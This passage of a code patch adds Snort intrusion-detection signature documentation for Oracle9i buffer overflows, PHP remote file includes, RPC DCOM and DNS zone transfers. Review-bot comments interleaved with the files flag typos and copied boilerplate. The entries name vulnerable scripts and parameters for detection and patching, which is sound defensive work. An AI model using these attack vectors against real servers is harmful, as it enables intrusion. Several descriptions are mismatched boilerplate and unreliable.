+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
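Review bot: same issues as 2820.txt: the procedure name register_snapshot_repgroup is separated from its full stop by a line break in Detailed Information, Affected Systems reads "Oracle Oracle9i", and Additional References is empty. This file also gives the package as the unqualified "dbms_repcat" while 2820.txt uses the schema-qualified "sys.dbms_repcat_fla_mas"; using one naming convention across the Oracle entries would help readers match the events to the packages.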
--- /dev/null
+++ b/doc/signatures/2281.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2281
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
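Review bot: Detailed Information has a stray space before the full stop ("MediaWiki ."), and "user input, this may lead" is a comma splice; suggest "...handling user input; this may lead...". "php files" should be "PHP files" to match the rest of the file. Corrective Action says only to run an up to date version, whereas the other PHP application entries in this patch also say to apply vendor supplied patches; aligning the wording would be consistent. Additional References is empty.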
--- /dev/null
+++ b/doc/signatures/100000501.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000501
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PictureDis" application running on a webserver. 
+Access to the file "wallpapr.php" using a remote file being passed as the 
+"lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "lang" parameter in the "wallpapr.php" script used by 
+the "PictureDis" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PictureDis
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
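Review bot: the blank line that precedes each "--" separator in the rest of this file is missing after the Sid value, after Affected Systems and after Contributors; add it for consistency with the other files in the patch. The third paragraph of Detailed Information is the same credential-validation boilerplate that does not describe a remote file include via "lang" in wallpapr.php, "running ona web server" should be "running on a web server", and "exploitation attempt has been attempted" is redundant.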
--- /dev/null
+++ b/doc/signatures/3232.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3232
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
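Review bot: this file is word-for-word identical to 3417.txt apart from the Sid, so the same fixes apply: Attack Scenarios (overly long filename via a network share) does not match the malformed RPC/DCOM request described in Detailed Information, "Expoit" should be "Exploit", and Additional References is empty. If sids 3232, 3320, 3407 and 3417 match different traffic, each file should say what distinguishes it; otherwise the duplicated text gives the reader no way to tell the four events apart.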
--- /dev/null
+++ b/doc/signatures/3320.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3320
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
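Review bot: same text as 3417.txt and 3232.txt with only the Sid changed; the same corrections apply (Attack Scenarios versus Detailed Information mismatch, "Expoit" typo, empty Additional References), and the file should state what sid 3320 specifically matches.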
--- /dev/null
+++ b/doc/signatures/1743.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1743
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
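Review bot: nothing in this file identifies which PHP application or request sid 1743 matches; the Summary promises "a known vulnerability" but Detailed Information is generic text about PHP applications, so the description should name the script or parameter the rule looks for. Also "running ona web server" should be "running on a web server", and the last line of the first Detailed Information paragraph runs well past the wrap width used for the rest of the file.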
--- /dev/null
+++ b/doc/signatures/732.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+732
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
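Review bot: Corrective Action is empty. Since Impact frames this as a policy matter and Detailed Information notes that the clients themselves may carry vulnerabilities, the section should at least say to enforce the policy (remove or restrict the client where it is not permitted, filter its traffic at the perimeter) and to keep permitted clients patched. False Positives "None known." is also doubtful: the Summary says the event fires on any use of a multimedia application, so legitimate, policy-compliant use will trigger it, and that should be stated.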
--- /dev/null
+++ b/doc/signatures/100000407.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000407
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "calday.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "calday.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
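Review bot: same issues as 100000396.txt: the credential-validation paragraph in Detailed Information does not describe the remote file include via "babInstallPath" in calday.php, "running ona web server" should be "running on a web server", "attackers choosing" needs an apostrophe, "exploitation attempt has been attempted" is redundant, and the file has stray blank lines at the start and end.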
--- /dev/null
+++ b/doc/signatures/100000574.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000574
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "cat_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
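Review bot: same layout problem as 100000501.txt: the blank line before "--" is missing after the Sid value, after Affected Systems and after Contributors. The credential-validation paragraph in Detailed Information does not describe the remote file include via "admin_template_path" in cat_add.php, and "exploitation attempt has been attempted" is redundant.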
--- /dev/null
+++ b/doc/signatures/2476.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2476
+
+--
+Summary:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to create an AndX entry
+via SMB.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings then create an entry in the winreg service.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
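Review bot: Detailed Information repeats the Summary word for word and never says what an "AndX entry" is or how it relates to the winreg service that Attack Scenarios and the CAN-1999-0562 reference point to; the section should explain which SMB request the rule matches and why it matters. Impact "Unknown." also sits oddly next to a Corrective Action that asks to firewall ports 135, 139 and 445; state the remote registry access risk the references describe. Minor: the reference entries lack the blank-line spacing used in 514.txt and 908.txt.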
--- /dev/null
+++ b/doc/signatures/3407.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3407
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
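Review bot: the Attack Scenarios paragraph ("a request for a file with an overly long filename via a network share") does not line up with the Detailed Information above it, which describes a malformed DCOM request over RPC; one of the two should be reworded so the reader can tell what traffic this rule actually matches. The Summary calls this a "known vulnerability" but Additional References is empty; cite the Microsoft security bulletin and CVE for the DCOM RPC flaw. Typo in Ease of Attack: "Expoit" should be "Exploit".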
--- /dev/null
+++ b/doc/signatures/1948.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1948
+
+--
+Summary:
+A zone transfer of records on the DNS server has been requested.
+
+A successful zone transfer can give valuable reconnaissance about hostnames and IP addresses for the domain.
+
+--
+Impact:
+Information leak, reconnaissance.  A malicious user can gain valuable 
+information about the network.
+
+
+--
+Detailed Information:
+Zone transfers are normally used to replicate zone information between 
+master and slave DNS servers.  If zone transfers have not been 
+restricted to authorized slave servers only, malicious users can attempt
+them for reconnaissance about the network.  The content |00 00 FC| looks
+for the end of a DNS query and a DNS type of 252 meaning a DNS zone 
+transfer.
+
+--
+Affected Systems:
+All versions of BIND.
+
+--
+Attack Scenarios:
+A zone transfer might be a precursor to some kind of attack to gain 
+reconnaissance.
+
+--
+Ease of Attack:
+Simple to perform using tools such as nslookup, dig, and host.
+
+
+--
+False Positives:
+Legitimate zone transfers from authorized slave servers may cause this 
+False positives may arise from TSIG DNS traffic.  If all of your slave 
+servers are in your $HOME_NET and you do not support TSIG, the 
+likelihood of false positives should be very low.
+
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Configure your DNS servers to allow zone transfers from authorized hosts
+only.  
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+CAN-1999-0532
+arachnids,212
+
+
+--
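Review bot: the False Positives section has a broken sentence: "Legitimate zone transfers from authorized slave servers may cause this" runs straight into "False positives may arise from TSIG DNS traffic." The first sentence needs its ending ("may cause this event to be generated."), and the TSIG sentence needs a word on why TSIG-signed traffic would match |00 00 FC|, otherwise the reader cannot act on it. Also, Affected Systems says "All versions of BIND.", but nothing in the Summary or Detailed Information is BIND-specific; any authoritative DNS server that answers AXFR requests is in scope, and the entry should say so.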
--- /dev/null
+++ b/doc/signatures/3340.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3340
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
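Review bot: this file is a verbatim copy of 3407.txt from the same patch, including the "Expoit" typo and the empty Additional References section. If SIDs 3340 and 3407 cover different transports, ports or stages of the DCOM exploit, the Detailed Information should say what distinguishes this rule; otherwise an analyst seeing both events has no way to tell them apart from the documentation.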
--- /dev/null
+++ b/doc/signatures/100000134.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+100000134
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Tcpdump. In particular, this event indicates that the exploit 
+was attempted via a malformed Resource Reservation Protocol (RSVP) packet.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS). Code execution may be possible.
+
+--
+Detailed Information:
+Tcpdump is a packet capture utility used on various BSD, Linux and UNIX style 
+operating systems.
+
+An error in the processing of the payload length in an RSVP packet may prevent 
+an attacker with the opportunity to overflow a fixed length buffer and execute 
+code of their choosing in the context of the user running tcpdump. This is 
+normally the super-user or administrator when tcpdump is used to sniff data 
+directly from a network interface.
+
+--
+Affected Systems:
+Tcpdump 3.9.1 and prior
+Ethereal 0.10.10 and prior
+
+--
+Attack Scenarios: 
+An attacker need to craft an RSVP packet with a packet payload length of 0 to 
+cause the overflow to manifest itself.
+
+-- 
+Ease of Attack: 
+Simple. Exploit code exists.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
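Review bot: in Detailed Information, "may prevent an attacker with the opportunity to overflow" says the opposite of what is meant; it should read "may present an attacker with the opportunity". Attack Scenarios: "An attacker need to craft" should be "needs to craft". Affected Systems lists "Ethereal 0.10.10 and prior" although the Summary and Detailed Information only discuss tcpdump; either describe the Ethereal issue or drop that line. Corrective Action is missing the full stop after "patch", and Additional References is empty for what the Summary calls a known vulnerability.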
--- /dev/null
+++ b/doc/signatures/1638.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+1638
+
+--
+Summary:
+This event is generated when a scan for the version of an ssh daemon is
+detected.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host. In
+particular an attempt has been made to scan for the version of the ssh
+daemon on the target host.
+
+This may be the prelude to an attack. Scanners are used to ascertain
+which ports a host may be listening on, whether or not the ports are
+filtered by a firewall and if the host is vulnerable to a particular
+exploit.
+
+--
+Affected Systems:
+	Any host using the ssh daemon.
+
+--
+Attack Scenarios:
+An attacker can determine if a vulnerable version of ssh is being used
+on a host, then proceed to exploit that vulnerablity.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+If the scanning tool does not send an identification string this rule
+will not generate an event.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
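Review bot: the False Negatives section says the rule fires only when the scanning tool sends an identification string, but the Detailed Information never says what that string is or where it is matched (a client banner, a particular scanner's version string?). Without it an analyst can neither judge the false negative nor tune the rule; add a sentence naming the matched content. Additional References is empty; if the string belongs to a specific scanner, reference it.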
--- /dev/null
+++ b/doc/signatures/2710.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2710
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_load
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
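Review bot: the Detailed Information has a broken line break: "vulnerability in the procedure begin_load" / ". This procedure is included in" / "dbms_offline_og." should be one sentence, "a vulnerability in the procedure begin_load, which is included in the dbms_offline_og package." Affected Systems reads "Oracle Oracle9i"; drop the duplicated word and, if known, give the release range. Additional References is empty although the Summary calls this a known vulnerability; the Oracle alert or CVE should be cited.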
--- /dev/null
+++ b/doc/signatures/100000363.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000363
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "search.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
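Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section are generic CGI boilerplate about "validating the credentials of a client host" and an attacker who "can access an authentication mechanism"; neither describes a remote file include. For an RFI through the config[fsBase] parameter the scenario is that the attacker supplies the URL of a PHP file on a host they control and search.php includes and executes it with the web server's privileges; say that instead. Smaller fixes: "exploitation attempt has been attempted" in the Summary is redundant ("an exploitation attempt"), "ona web server" should be "on a web server", and the file starts with two blank lines that the other files in the patch do not have.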
--- /dev/null
+++ b/doc/signatures/3451.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3451
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
